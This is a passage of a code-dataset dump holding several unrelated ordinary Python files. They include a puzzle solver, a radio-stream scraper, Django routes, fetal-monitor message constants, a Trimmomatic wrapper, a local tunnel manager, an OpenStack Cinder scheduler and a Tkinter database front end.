visit[i][j] = 1\n color[cur_color_num] += 1\n dfs(index+1,count+1)\n color[cur_color_num] -= 1\n for i,j in cur:\n visit[i][j] = 0\n\n if count == (min_color-2):\n return\n\n dfs(index+1,count)\n\n\ndfs(index,0)\n\"\"\"\n\nif Ans == 10000:\n print(-1)\nelse:\n print(Ans)\n","sub_path":"색종이 붙이기2.py","file_name":"색종이 붙이기2.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"148171410","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\nnetworks = {\n 'DI.fm': ('http://www.di.fm/', 'http://listen.di.fm/public3{0}.pls'),\n 'Jazzradio.com': ('http://www.jazzradio.com/',\n 'http://listen.jazzradio.com/public1{0}.pls'),\n 'RadioTunes': ('http://www.radiotunes.com/',\n 'http://listen.radiotunes.com/public1{0}.pls')\n}\nselector = 'div.lists ul li a'\n\nfor n in networks:\n print(n, '...')\n raw = urllib.request.urlopen(networks[n][0]).read()\n soup = BeautifulSoup(raw)\n\n links = []\n streams = soup.select('div.lists ul li a')\n for s in streams:\n \tlinks.append(networks[n][1].format(s.attrs['href']))\n\n open('{0}.txt'.format(n), 'w').write('\\n'.join(links))","sub_path":"radioscrape.py","file_name":"radioscrape.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"228733113","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^aluno/', include('aluno.urls', namespace='aluno')),\n url(r'^candidato/', include('candidato.urls', namespace='candidato')),\n url(r'^coordenador/', include('coordenador.urls', namespace='coordenador')),\n url(r'^professor/', include('professor.urls', namespace='professor')),\n url(r'^usuarios_fbv/', include('usuarios_fbv.urls', namespace='usuarios_fbv')),\n url(r'^usuarios_fbv_user/', include('usuarios_fbv_user.urls', namespace='usuarios_fbv_user')),\n url(r'^$', 'apps.views.home'),\n]\n","sub_path":"apps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"413626352","text":"# coding: utf-8\n\n#\n# Copyright Douglas Williams, 2018\n# All Rights Reserved\n#\n\n#\n# Messages\n#\n\n# Enumeration of messages\nDIAG_CHECK_MONITOR = 'DIAG_CHECK_MONITOR'\nDIAG_NORMAL = 'DIAG_NORMAL'\nDIAG_TACHYCARDIA = 'DIAG_TACHYCARDIA'\nDIAG_BRADYCARDIA = 'DIAG_BRADYCARDIA'\nDIAG_SEVERE_BRADYCARDIA = 'DIAG_SEVERE_BRADYCARDIA'\nDIAG_FHRV_MARKED = 'DIAG_FHRV_MARKED'\nDIAG_FHRV_LOW = 'DIAG_FHRV_LOW'\n\nDIAG_MARKED_PROLONGED = 'DIAG_MARKED_PROLONGED'\nDIAG_LONG_PROLONGED = 'DIAG_LONG_PROLONGED'\nDIAG_PROLONGED = 'DIAG_PROLONGED'\n\nDIAG_REPETITIVE_LATE_DECEL_LOW_VAR = 'DIAG_REPETITIVE_LATE_DECEL_LOW_VAR'\nDIAG_REPETITIVE_LATE_DECEL = 'DIAG_REPETITIVE_LATE_DECEL'\nDIAG_LATE_DECEL = 'DIAG_LATE_DECEL'\n\nDIAG_REPETITIVE_PERIODIC_VARIABLE = 'DIAG_REPETITIVE_PERIODIC_VARIABLE'\n\nDIAG_ACCEL_MISSING = 'DIAG_ACCEL_MISSING'\nDIAG_TACHYSYSTOLE = 'DIAG_TACHYSYSTOLE'\nDIAG_NO_CONTRACTIONS = 'DIAG_NO_CONTRACTIONS'\n\n\n\n# Diag meetinga for IA\nDIAG_CONTINUE_IA = 'DIAG_CONTINUE_IA'\nDIAG_COMPLETE_IA = 'DIAG_COMPLETE_IA'\n\n\n\n# DIAG_PLACENTAL_INSUFFICIENCY = 'DIAG_PLACENTAL_INSUFFICIENCY'\n# DIAG_ABRUPTION = 'DIAG_ABRUPTION'\n#\n# DIAG_CORD_COMPRESSION = 'DIAG_CORD_COMPRESSION'\n#\n# DIAG_OBSTRUCTED_LABOR = 'DIAG_OBSTRUCTED_LABOR'\n\n\n\n# Message details\nALL_DIAGNOSTIC_MESSAGES = {\n DIAG_CHECK_MONITOR: {'text': 'No recent updates from patient monitor', 'order': 1},\n DIAG_NORMAL: {'text': 'Normal for this fetus', 'order': 1},\n DIAG_TACHYCARDIA: {'text': 'Tachycardia: Fetal heart rate above 160', 'order': 2},\n DIAG_BRADYCARDIA: {'text': 'Bradycardia: Fetal heart rate below 110', 'order': 2},\n DIAG_SEVERE_BRADYCARDIA: {'text': 'Severe Bradycardia: Fetal heart rate above 100', 'order': 3},\n\n DIAG_FHRV_MARKED: {'text': 'Marked fetal heart rate variability for over 30 min', 'order': 2},\n DIAG_FHRV_LOW: {'text': 'Low fetal heart rate variability for over 50 min', 'order': 2},\n\n DIAG_MARKED_PROLONGED: {'text': 'URGENT: Prolonged Deceleleration with severe bradycardia', 'order': 4},\n DIAG_LONG_PROLONGED: {'text': 'Prolonged Deceleleration over 5 min', 'order': 3},\n DIAG_PROLONGED: {'text': 'Prolonged Deceleleration present', 'order': 2},\n\n DIAG_REPETITIVE_LATE_DECEL: {'text': 'Repetitive Late Decelelerations', 'order': 3},\n DIAG_REPETITIVE_LATE_DECEL_LOW_VAR: {'text': 'Repetitive Late Decelelerations with low variability', 'order': 4},\n DIAG_LATE_DECEL: {'text': 'Late Decelelerations present', 'order': 2},\n\n DIAG_REPETITIVE_PERIODIC_VARIABLE: {'text': 'Repetitive Variable Decelelerations', 'order': 3},\n\n DIAG_ACCEL_MISSING: {'text': 'Accelerations absent for over 50 min', 'order': 2},\n\n DIAG_TACHYSYSTOLE: {'text': 'Tachysystole: Contraction rate > 5 per 10 min', 'order': 2},\n DIAG_NO_CONTRACTIONS: {'text': 'No recent contractions', 'order': 2},\n\n DIAG_CONTINUE_IA: {'text': 'Continue monitoring of patient', 'order': 1},\n DIAG_COMPLETE_IA: {'text': 'IA Testing Complete', 'order': 1},\n\n # DIAG_PLACENTAL_INSUFFICIENCY: {'text': 'Placental insufficiency', 'order': 1},\n # DIAG_ABRUPTION: {'text': 'Abruption', 'order': 2},\n # DIAG_CORD_COMPRESSION: {'text': 'Potential cord compression', 'order': 2},\n}\n\n","sub_path":"LowCostCTG_Development/rules_message_digest.py","file_name":"rules_message_digest.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"650375892","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 14 09:29:23 2017\r\n\r\n@author: Eric\r\n\"\"\"\r\n\r\n## read csv file containing SRR numbers, one per line\r\nimport sys\r\nfrom subprocess import call\r\nfrom csv import reader\r\nfrom contextlib import contextmanager\r\nimport os\r\n\r\n@contextmanager\r\ndef cd(newdir):\r\n prevdir = os.getcwd()\r\n os.chdir(os.path.expanduser(newdir))\r\n try:\r\n yield\r\n finally:\r\n os.chdir(prevdir)\r\n## loop through the csv file and call trimmomatic on each one\r\n\r\ndef makeConfigFile(direct):\r\n with cd(direct):\r\n call('ls *.fastq.gz > filenames.csv', shell=True)\r\n\r\ndef Trim():\r\n assert (len(sys.argv)==3),\"Usage: PreProcess.py fastq_file_path adapters_to_clip.fa \\\r\n This script takes the three arguments listed above. Clipping is done with trimmomatic, \\\r\n the .jar of trimmomatic and adapter fasta must be in the same directory as this script. \\\r\n Output will be sent to Trim_output directory, which will be a sub-directory of the current working directory. \\\r\n If any Trimmomatic params must be modified, it should be modifies directly from the source code. \\\r\n Defaults are currently: paired-end, phred33, sliding window of 4 with min quality of 20. \\\r\n Please do not enter full path to adapter file\"\r\n script = sys.argv[0]\r\n file_path = str(sys.argv[1])\r\n \r\n makeConfigFile(file_path)\r\n files = file_path+\"\\\\filenames.csv\"\r\n\r\n adapt_file = str(sys.argv[2])\r\n\r\n csv_reader = reader(open(files,\"r\"), quotechar=\"\\\"\")\r\n\r\n list_files =[]\r\n for row in csv_reader:\r\n list_files.append(row)\r\n\r\n list_files.sort\r\n\r\n \r\n call(['mkdir', 'Trim_output'])\r\n with cd(\"Trim_output\"): \r\n x=0\r\n while x[0-9]+)')\n\n def log_message(self, format, *args):\n return\n\n def send_headers(self, content_type):\n self.send_response(200)\n self.send_header('Content-type', content_type)\n self.end_headers()\n \n \n def get_id(self):\n match = self.rx_id.match(self.path)\n if match is None:\n logging.debug(\"enabled request without id {}\".format(self.path))\n self.wfile.write(b'{}')\n return None\n\n th_id = int(match.group(1))\n if th_id not in self.thrs:\n logging.debug(\"id {} not found in threads\".format(self.path))\n self.wfile.write(b'{}')\n return None\n return th_id\n \n\n def get_content_type(self, filename):\n p, ext = os.path.splitext(filename)\n ext = ext.lower()\n if ext == \".html\":\n return \"text/html\"\n elif ext == \".js\":\n return \"text/javascript\"\n elif ext == \".svg\":\n return \"image/svg+xml\"\n elif ext == \".jpg\" or ext == \".jpeg\":\n return \"image/jpeg\"\n elif ext == \".png\":\n return \"image/png\"\n elif ext == \".ico\":\n return \"image/x-icon\"\n else:\n return \"text/plain\"\n \n \n def do_GET(self):\n if self.path == '/list':\n self.send_headers(\"application/json\")\n text = '['\n for tun_id in self.thrs:\n tun = self.thrs[tun_id]\n text += '{'\n text += '\"id\":\"{}\",'.format(tun['id'])\n text += '\"name\":\"{}\",'.format(tun['name'])\n text += '\"note\":\"{}\",'.format(tun['note'])\n if tun['enabled'] == True:\n text += '\"enabled\": true,'\n else:\n text += '\"enabled\": false,'\n if ping(tun['local_port']):\n text += '\"status\": true,'\n else:\n text += '\"status\": false,'\n text += '\"cmd\":\"{}\",'.format(tun['cmd'])\n text += '\"local_port\":\"{}\",'.format(tun['local_port'])\n text += '\"url\":\"{}\",'.format(tun['url'])\n text += '\"num\":\"{}\"'.format(tun['num'])\n text += '},'\n text = text[:-1] + ']'\n self.wfile.write(bytes(text, 'utf8'))\n return\n\n elif self.path.startswith('/enabled'):\n self.send_headers(\"application/json\")\n th_id = self.get_id()\n if th_id is not None:\n enabled = self.thrs[th_id]['enabled']\n self.wfile.write(\n bytes('{' + '\"enabled\": {}'.format(enabled) + '}', 'utf8'))\n return\n \n elif self.path.startswith('/status'):\n self.send_headers(\"application/json\")\n th_id = self.get_id()\n if th_id is not None:\n port = self.thrs[th_id]['local_port']\n is_on = ping(port)\n self.wfile.write(bytes('{' + '\"on\": {}'.format(is_on) + '}', 'utf8'))\n return\n \n elif self.path.startswith('/switch'):\n self.send_headers(\"application/json\")\n th_id = self.get_id()\n if th_id is not None:\n if self.thrs[th_id]['enabled']:\n self.thrs[th_id]['enabled'] = False\n else:\n self.thrs[th_id]['enabled'] = True\n \n self.wfile.write(\n bytes('{' + '\"enabled\": {}'.format(self.thrs[th_id]['enabled']) + '}', 'utf8'))\n return\n else:\n if self.path == '/':\n #self.send_headers(\"text/html\")\n filename = self.root_templates + '/index.html'\n else:\n filename = self.root_templates + self.path\n if os.path.exists(filename):\n content_type = self.get_content_type(filename)\n self.send_headers(content_type)\n if content_type.startswith('image'):\n with open(filename, 'rb') as fh:\n self.wfile.write(fh.read())\n else:\n with open(filename, 'r') as fh:\n self.wfile.write(bytes(fh.read(), 'utf8'))\n \n\ndef run_http(thrs, port):\n StatusHTTPRequestHandler.thrs = thrs\n httpd = HTTPServer(('localhost', port), StatusHTTPRequestHandler)\n logging.debug('listen server localhost:{}'.format(port))\n print('open: http://localhost:{}'.format(port))\n httpd.serve_forever()\n\n\ndef threads_loop(thrs, max_death_count, timeout):\n death_count = 0\n max_death_count = len(thrs) * max_death_count\n while True:\n for tun_id in thrs:\n logging.debug(thrs)\n if thrs[tun_id]['enabled']:\n # ping\n logger.debug('thread {} enabled: {}, obj: {}'.format(\n tun_id, thrs[tun_id]['enabled'], thrs[tun_id]))\n if not ping(thrs[tun_id]['local_port']):\n logger.debug('thread cycle - enabled')\n if thrs[tun_id]['process'] is not None:\n thrs[tun_id]['process'].terminate()\n death_count += 1\n else:\n death_count = 0\n\n # restart or start\n if thrs[tun_id]['process'] is None or not thrs[tun_id]['process'].is_alive():\n thrs[tun_id]['process'], thrs[tun_id]['pid'] = start_process(\n thrs[tun_id]['cmd'].split(' '))\n logger.debug('started process: {}'.format(\n thrs[tun_id]['name']))\n else:\n # not enabled - terminate\n logger.debug('thread {} enabled: {}, obj: {}'.format(\n tun_id, thrs[tun_id]['enabled'], thrs[tun_id]))\n if thrs[tun_id]['process'] is not None and thrs[tun_id]['process'].is_alive():\n logger.debug('thread cycle - not enabled')\n logger.debug('terminate: {}'.format(thrs[tun_id]))\n pid = thrs[tun_id]['pid']\n os.kill(pid, signal.SIGTERM)\n thrs[tun_id]['process'].terminate()\n logger.debug('process {} stoped, pid: {}'.format(\n thrs[tun_id]['name'], pid))\n thrs[tun_id]['num'] += 1\n\n if death_count >= max_death_count:\n logger.info('exceeded death count!')\n return -1\n time.sleep(SLEEP)\n\ndef print_help():\n print(\"usage:\")\n print(\" {} - for run with default config\".format(sys.argv[0]))\n print(\" {} [path-to-config-file] - for run with custom config\".format(sys.argv[0]))\n print(\" {} [-h|--help] - print this help\".format(sys.argv[0]))\n\n\ndef main():\n \"\"\"\n Enter point\n :return:\n \"\"\"\n port = 8000\n os.makedirs('logs', exist_ok=True)\n tun_id = 0\n threads = {}\n if len(sys.argv) >= 2:\n if sys.argv[1].lower() == '-h' or sys.argv[1].lower() == '--h':\n print_help()\n return 0\n else:\n jconf = load_configs(sys.argv[1])\n else:\n jconf = load_configs()\n \n port = int(jconf.get('ui_port', 8000))\n max_death_count = int(jconf.get('max_death_count', 5))\n timeout = int(jconf.get('timeout', 3))\n loging_conf = jconf['logging_conf']\n logging.config.dictConfig(loging_conf)\n \n \n tunns = get_tunnels(jconf)\n for tunnel in tunns:\n if tunnel['enabled']:\n tunnel['process'], tunnel['pid'] = start_process(\n tunnel['cmd'].split(' '))\n else:\n tunnel['process'] = None\n threads[tun_id] = tunnel\n tun_id += 1\n\n th_http = Thread(target=run_http, args=(threads, port))\n th_http.start()\n time.sleep(1)\n threads_loop(threads, max_death_count, timeout)\n\nif __name__ == '__main__':\n main()\n","sub_path":"tunns.py","file_name":"tunns.py","file_ext":"py","file_size_in_byte":10188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"592560850","text":"# Copyright (c) 2010 OpenStack Foundation\n# Copyright 2010 United States Government as represented by the\n# Administrator of the National Aeronautics and Space Administration.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nChance (Random) Scheduler implementation\n\"\"\"\n\nimport random\n\nfrom oslo.config import cfg\n\nfrom cinder import exception\nfrom cinder.scheduler import driver\n\n\nCONF = cfg.CONF\n\n\nclass ChanceScheduler(driver.Scheduler):\n \"\"\"Implements Scheduler as a random node selector.\"\"\"\n\n def _filter_hosts(self, request_spec, hosts, **kwargs):\n \"\"\"Filter a list of hosts based on request_spec.\"\"\"\n\n filter_properties = kwargs.get('filter_properties', {})\n if not filter_properties:\n filter_properties = {}\n ignore_hosts = filter_properties.get('ignore_hosts', [])\n hosts = [host for host in hosts if host not in ignore_hosts]\n return hosts\n\n def _get_weighted_candidates(self, context, topic, request_spec, **kwargs):\n \"\"\"Returns a list of the available hosts.\"\"\"\n\n elevated = context.elevated()\n hosts = self.hosts_up(elevated, topic)\n if not hosts:\n msg = _(\"Is the appropriate service running?\")\n raise exception.NoValidHost(reason=msg)\n\n return self._filter_hosts(request_spec, hosts, **kwargs)\n\n def _choose_host_from_list(self, hosts):\n return hosts[int(random.random() * len(hosts))]\n\n def _schedule(self, context, topic, request_spec, **kwargs):\n \"\"\"Picks a host that is up at random.\"\"\"\n hosts = self._get_weighted_candidates(context, topic,\n request_spec, **kwargs)\n if not hosts:\n msg = _(\"Could not find another host\")\n raise exception.NoValidHost(reason=msg)\n return self._choose_host_from_list(hosts)\n\n def schedule_create_volume(self, context, request_spec, filter_properties):\n \"\"\"Picks a host that is up at random.\"\"\"\n topic = CONF.volume_topic\n host = self._schedule(context, topic, request_spec,\n filter_properties=filter_properties)\n volume_id = request_spec['volume_id']\n snapshot_id = request_spec['snapshot_id']\n image_id = request_spec['image_id']\n\n updated_volume = driver.volume_update_db(context, volume_id, host)\n self.volume_rpcapi.create_volume(context, updated_volume, host,\n request_spec, filter_properties,\n snapshot_id=snapshot_id,\n image_id=image_id)\n\n def host_passes_filters(self, context, host, request_spec,\n filter_properties):\n \"\"\"Check if the specified host passes the filters.\"\"\"\n weighed_hosts = self._get_weighted_candidates(\n context,\n CONF.volume_topic,\n request_spec,\n filter_properties=filter_properties)\n\n for weighed_host in weighed_hosts:\n if weighed_host == host:\n elevated = context.elevated()\n host_states = self.host_manager.get_all_host_states(elevated)\n for host_state in host_states:\n if host_state.host == host:\n return host_state\n\n msg = (_('cannot place volume %(id)s on %(host)s')\n % {'id': request_spec['volume_id'], 'host': host})\n raise exception.NoValidHost(reason=msg)\n\n def find_retype_host(self, context, request_spec, filter_properties,\n migration_policy='never'):\n \"\"\"Find a host that can accept the volume with its new type.\"\"\"\n current_host = request_spec['volume_properties']['host']\n\n # The volume already exists on this host, and so we shouldn't check if\n # it can accept the volume again.\n filter_properties['vol_exists_on'] = current_host\n\n weighed_hosts = self._get_weighted_candidates(\n context,\n CONF.volume_topic,\n request_spec,\n filter_properties=filter_properties)\n if not weighed_hosts:\n msg = (_('No valid hosts for volume %(id)s with type %(type)s')\n % {'id': request_spec['volume_id'],\n 'type': request_spec['volume_type']})\n raise exception.NoValidHost(reason=msg)\n\n target_host = None\n for weighed_host in weighed_hosts:\n if weighed_host == current_host:\n target_host = current_host\n\n if migration_policy == 'never' and target_host is None:\n msg = (_('Current host not valid for volume %(id)s with type '\n '%(type)s, migration not allowed')\n % {'id': request_spec['volume_id'],\n 'type': request_spec['volume_type']})\n raise exception.NoValidHost(reason=msg)\n\n if not target_host:\n target_host = self._choose_host_from_list(weighed_hosts)\n\n elevated = context.elevated()\n host_states = self.host_manager.get_all_host_states(elevated)\n for host_state in host_states:\n if host_state.host == target_host:\n return (host_state, migration_policy)\n\n # NOTE(avishay):We should never get here, but raise just in case\n msg = (_('No host_state for selected host %s') % target_host)\n raise exception.NoValidHost(reason=msg)\n","sub_path":"cinder/scheduler/chance.py","file_name":"chance.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"619909850","text":"from database_class import *\nfrom nameparser_class import *\nfrom Tkconstants import *\nfrom PIL import ImageTk, Image\nimport Tkinter,sys,ttk,time,datetime,tkMessageBox,tkFileDialog,decimal,traceback\n\nclass Form:\n\n #konstruktor za formu\n def __init__(self,root):\n self.now = datetime.datetime.now()\n #iniciramo novi prozor\n self.form = Tkinter.Toplevel(root,relief=RIDGE,borderwidth=2)\n self.form.attributes('-topmost',1)\n\n #dizajn forme\n def createForm(self,tableName,refreshParent,parent,instance):\n #iniciramo pomocne varijable\n row_pos = 0\n field = dict()\n btn_rows = dict()\n values = []\n InputColumns = list(set(db.getTableColumns(tableName))-set(db.getForeignKeys(tableName))-set(db.getCounterColumns(tableName)))\n \n #stupci koji nisu counter ni fk, za njih radimo text field\n for column in InputColumns:\n label = Tkinter.Label(self.form,text=column,font=('Calibri New',12))\n label.grid(row=row_pos,sticky=W,padx=2)\n \n #za nas postoji specijalan slucaj oko vremena posudbe i vrste opreme\n if column=='vrsta' and tableName=='oprema':\n vrsta = ttk.Combobox(self.form,width=52)\n vrsta['values']=['audio','video','ostalo']\n field.update({str(column): vrsta})\n elif column=='vrijeme' and tableName=='posudba':\n vrijeme = Tkinter.Entry(self.form,width=30,font='Helvetica 14')\n vrijeme.insert(0,str(self.now.day)+'.'+str(self.now.month)+'.'+str(self.now.year)+'.')\n vrijeme.configure(state='readonly')\n field.update({str(column): vrijeme})\n else:\n field.update({str(column): Tkinter.Entry(self.form,width=30,font='Helvetica 14')})\n field[str(column)].grid(row=row_pos,column=1)\n row_pos += 1\n\n #stupci koji su counter se ne prikazuju, a fk je listbox\n for keys in db.getForeignKeys(tableName):\n label = Tkinter.Label(self.form,text=keys,font=('Calibri New',12))\n label.grid(row=row_pos,sticky=W,padx=2)\n\n #spremi row_pos od fk za gumbic kasnije\n if 'clan' in keys:\n btn_rows.update({'clan':row_pos})\n elif 'koncert' in keys:\n btn_rows.update({'konc':row_pos})\n elif 'oprema' in keys:\n btn_rows.update({'oprema':row_pos})\n \n #kreiramo listbox\n fbox = ttk.Combobox(self.form,width=52)\n fbox['values'] = db.getColumnContents(db.getReferencedTable(tableName,keys),db.getVarchars(db.getReferencedTable(tableName,keys)),True)\n field.update({str(keys): fbox})\n field[str(keys)].current(0)\n field[str(keys)].grid(row=row_pos,column=1)\n InputColumns.append(keys)\n row_pos += 1\n\n #treci stupac s gumbicima za dodavanje u pomocne tablice\n if tableName=='posudba':\n self.clan = Tkinter.Button(self.form,text='Dodaj novog člana'.decode('windows-1250'),width=15,height=1,command=lambda:Form(self.form).createForm('clan',True,'posudba',self))\n self.oprema = Tkinter.Button(self.form,text='Dodaj novu opremu',width=15,height=1,command=lambda:Form(self.form).createForm('oprema',True,'posudba',self))\n self.clan.grid(row=btn_rows['clan'],column=2,padx=5,pady=2)\n self.oprema.grid(row=btn_rows['oprema'],column=2,padx=5,pady=2)\n elif tableName=='organizira':\n self.clan = Tkinter.Button(self.form,text='Dodaj novog člana'.decode('windows-1250'),width=15,height=1,command=lambda:Form(self.form).createForm('clan',True,'organizira',self))\n self.koncert = Tkinter.Button(self.form,text='Dodaj novi koncert',width=15,height=1,command=lambda:Form(self.form).createForm('koncert',True,'organizira',self))\n self.clan.grid(row=btn_rows['clan'],column=2,padx=2,pady=2)\n self.koncert.grid(row=btn_rows['konc'],column=2,padx=2,pady=2)\n\n #iniciranje gumbica\n Next = Tkinter.Button(self.form,text='>',command=lambda:db.insertRecord(tableName,field,True,parent,self,None))\n if refreshParent:\n OK = Tkinter.Button(self.form,text='OK',width=15,command=lambda:db.insertRecord(tableName,field,False,parent,self,instance))\n else:\n OK = Tkinter.Button(self.form,text='OK',width=15,command=lambda:db.insertRecord(tableName,field,False,parent,self,None))\n Cancel = Tkinter.Button(self.form,text='Cancel',width=15,command=lambda:self.form.destroy())\n\n #pozicioniranje gumbica\n Next.grid(row=row_pos,column=2,pady=5,padx=5)\n OK.grid(row=row_pos,column=1)\n Cancel.grid(row=row_pos,column=0)\n\nclass Table:\n\n #konstruktor za novi prozor i scrollbar\n def __init__(self,root):\n self.window = Tkinter.Toplevel(root,relief=RIDGE,borderwidth=2)\n self.window.attributes('-topmost',1)\n self.yscrollbar = Tkinter.Scrollbar(self.window)\n self.yscrollbar.pack(side=RIGHT,fill=Y)\n self.xscrollbar = Tkinter.Scrollbar(self.window,orient=HORIZONTAL)\n self.xscrollbar.pack(side=BOTTOM,fill=X)\n\n #metoda koja inicira listu s podacima\n def openTable(self,tableName):\n self.table = Tkinter.Text(self.window,wrap=NONE,tabs='8c',xscrollcommand=self.xscrollbar.set,yscrollcommand=self.yscrollbar.set,width=100,font=('Calibri New', 10),padx=10)\n if tableName=='oprema': records = db.specialReport()\n else: records = db.prepareRecords(tableName)\n #broj crtica\n l=0\n for element in db.getTableColumns(tableName): l+=len(element)\n l=(40*(len(db.getTableColumns(tableName))-1)+l+30)\n\n #smjesti prikupljene podatke iz liste na GUI\n for row in records:\n #prvo predivna crta4\n for i in range(0,l): self.table.insert(END,'_')\n self.table.insert(END,'\\n')\n self.table.insert(END,'\\n')\n\n #pa onda podaci\n for element in row:\n if element in db.getTableColumns(tableName):\n self.table.insert(END,NameParser().parse(element))\n else:\n self.table.insert(END,unicode(element))#decode('windows-1250'))\n self.table.insert(END,'\\t')\n self.table.insert(END,'\\n')\n #i za kraj crta\n for i in range(0,l): self.table.insert(END,'_')\n self.table.pack(side=LEFT,fill=BOTH,expand=YES)\n self.yscrollbar.config(command=self.table.yview)\n self.xscrollbar.config(command=self.table.xview)\n\nclass List:\n\n #konstruktor za iniciranje prozora\n def __init__(self,root):\n self.root = root\n self.window = Tkinter.Toplevel(self.root)\n self.window.attributes('-topmost',1)\n\n #metoda koja otvara formu za azuriranje odabrane celije\n def editField(self,w,index):\n #trigger za posudba vrijeme\n if self.table=='posudba' and w.get(0)=='vrijeme':\n tkMessageBox.showerror('Neuspjeh!','Vrijeme se ne moze promijeniti!')\n return\n\n #inicira formu za azuriranje\n self.edit = Tkinter.Toplevel(self.window)\n self.edit.attributes('-topmost',1)\n\n label = Tkinter.Label(self.edit,text='Unesite novu vrijednost: ',font=('Calibri New',12))\n label.grid(row=0,column=0)\n\n colName = NameParser().deparse(w.get(0))\n #vanjski kljucevi moraju biti dropdown, a inace je text field\n if colName in db.getForeignKeys(self.table):\n field = ttk.Combobox(self.edit,width=52)\n refTable = db.getReferencedTable(self.table,colName)\n field['values'] = db.getColumnContents(refTable,db.getVarchars(refTable),True)\n else:\n field = Tkinter.Entry(self.edit,width=30,font='Helvetica 14')\n field.grid(row=0,column=1)\n\n #gumbici\n OK = Tkinter.Button(self.edit,text='OK',width=15,command=lambda:db.updateRow(self.table,colName,field.get().split(', ')[0],self.boxes,index,self))\n OK.grid(row=1,column=1)\n Cancel = Tkinter.Button(self.edit,text='Cancel',width=15,command=lambda:self.edit.destroy())\n Cancel.grid(row=1,column=0)\n\n #brisanje odabranog retka\n def removeField(self,w,index):\n question = 'Potvrdite brisanje zapisa '\n for i in self.boxes:\n question += i.get(index)+', '\n question = question[:-2]\n if tkMessageBox.askyesno('Brisanje zapisa',question):\n db.deleteRow(self.table,self.boxes,index,self)\n \n #izvuci GUI element i index selektirane celije\n def getSelection(self,event):\n if not self.destructive:\n self.editField(event.widget,int(event.widget.curselection()[0]))\n else:\n self.removeField(event.widget,int(event.widget.curselection()[0]))\n \n #metoda za scrollanje\n def moveList(self, *args):\n for b in self.boxes:\n b.yview(*args)\n\n #baca staru listu\n def dropList(self):\n for b in self.boxes:\n b.pack_forget()\n self.scroll.pack_forget()\n\n #kreiranje liste\n def createList(self,tableName,destructive):\n self.table = tableName\n self.destructive = destructive\n self.boxes=[]\n self.scroll = Tkinter.Scrollbar(self.window,orient='vertical',command=self.moveList)\n self.scroll.pack(side=RIGHT,fill=Y)\n self.table = tableName\n records = db.prepareRecords(tableName)\n\n #za svaki atribut i njegove podatke kreira se posebni listbox\n k=0\n for row in records[0]:\n temp = Tkinter.Listbox(self.window,width=25,height=15)\n temp.bind('<>', self.getSelection)\n counter=0\n for element in records:\n if records[counter][k] in db.getTableColumns(tableName):\n temp.insert(END,NameParser().parse(records[counter][k]))\n else:\n temp.insert(END,records[counter][k])\n counter+=1\n self.boxes.append(temp)\n k+=1\n temp.pack(side=LEFT,fill=BOTH,expand=YES) \n \nclass TkApp:\n\n #konstruktor za iniciranje korijena\n def __init__(self):\n self.root = Tkinter.Tk()\n self.root.wm_title(\"Udruga\")\n\n def callDB(self):\n tkMessageBox.showinfo(title=\"Odabir datoteke\",message=\"Prije ulaska odaberite MS Access datoteku.\",parent=self.root)\n return tkFileDialog.askopenfilename(parent=self.root)\n\n #inicira aplikaciju\n def start(self):\n #iniciraj prozor\n self.frame = Tkinter.Frame(self.root,relief=RIDGE,borderwidth=2)\n\n #logo slika\n self.logo = ImageTk.PhotoImage(file='vura_logo.jpg')\n self.pic = Tkinter.Label(self.frame, image=self.logo)\n self.pic.grid(row=0,column=0,columnspan=4,pady=15)\n\n #set za clanove\n self.clanlabel = Tkinter.Label(self.frame,text='Članovi'.decode('windows-1250'),font=('Arial',14))\n self.popis = Tkinter.Button(self.frame,text='Popis članova'.decode('windows-1250'),width=30,height=2,command=lambda:Table(self.root).openTable('clan'))\n self.dodaj = Tkinter.Button(self.frame,text='Dodaj novog člana'.decode('windows-1250'),width=30,height=2,command=lambda:Form(self.root).createForm('clan',False,None,None))\n self.azuriraj = Tkinter.Button(self.frame,text='Ažuriraj članove'.decode('windows-1250'),width=30,height=2,command=lambda:List(self.root).createList('clan',False))\n self.obrisi = Tkinter.Button(self.frame,text='Obriši člana'.decode('windows-1250'),width=30,height=2,command=lambda:List(self.root).createList('clan',True))\n self.clanlabel.grid(row=1,column=0,pady=5)\n self.popis.grid(row=2,column=0,padx=10,pady=5)\n self.dodaj.grid(row=3,column=0,padx=10,pady=5)\n self.azuriraj.grid(row=4,column=0,padx=10,pady=5)\n self.obrisi.grid(row=5,column=0,padx=10,pady=5)\n\n #set za posudbu\n self.posudbalabel = Tkinter.Label(self.frame,text='Posudba',font=('Arial',14))\n self.evidentiraj = Tkinter.Button(self.frame,text='Evidentiraj posudbu',width=30,height=2,command=lambda:Form(self.root).createForm('posudba',False,None,None))\n self.izvjestajpos = Tkinter.Button(self.frame,text='Izvještaj posudbe'.decode('windows-1250'),width=30,height=2,command=lambda:Table(self.root).openTable('posudba'))\n self.azurirajpos = Tkinter.Button(self.frame,text='Izmjeni posudbu',width=30,height=2,command=lambda:List(self.root).createList('posudba',False))\n self.stanjepos = Tkinter.Button(self.frame,text='Provjeri stanje na 